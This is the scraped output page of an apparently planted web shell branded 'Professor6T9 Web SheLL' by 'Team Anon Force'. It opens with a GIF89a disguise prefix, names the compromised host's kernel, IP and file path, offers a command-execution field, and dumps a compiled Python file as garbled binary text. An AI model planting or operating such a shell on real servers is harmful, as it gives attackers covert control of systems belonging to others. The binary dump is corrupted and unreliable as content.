GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib
/
python3.11
/
site-packages
/
libfuturize
/
fixes
/
__pycache__
[ HOME ]
Exec
Submit
File Name : fix_cmp.cpython-311.pyc
� � h� � �X � d Z ddlmZ ddlmZ ddlmZ dZ G d� dej � � Z dS ) z� Fixer for the cmp() function on Py2, which was removed in Py3. Adds this import line:: from past.builtins import cmp if cmp() is called in the code. � )�unicode_literals)� fixer_base)�touch_import_topz name='cmp'c �F � e Zd ZdZdZd� e� � Zd� ZdS )�FixCmpT� zs power< ({0}) trailer< '(' args=[any] ')' > rest=any* > c �B � |d }t d|j |� � d S )N�namez past.builtins)r �value)�self�node�resultsr s �j/builddir/build/BUILD/cloudlinux-venv-1.0.8/venv/lib/python3.11/site-packages/libfuturize/fixes/fix_cmp.py� transformzFixCmp.transform s&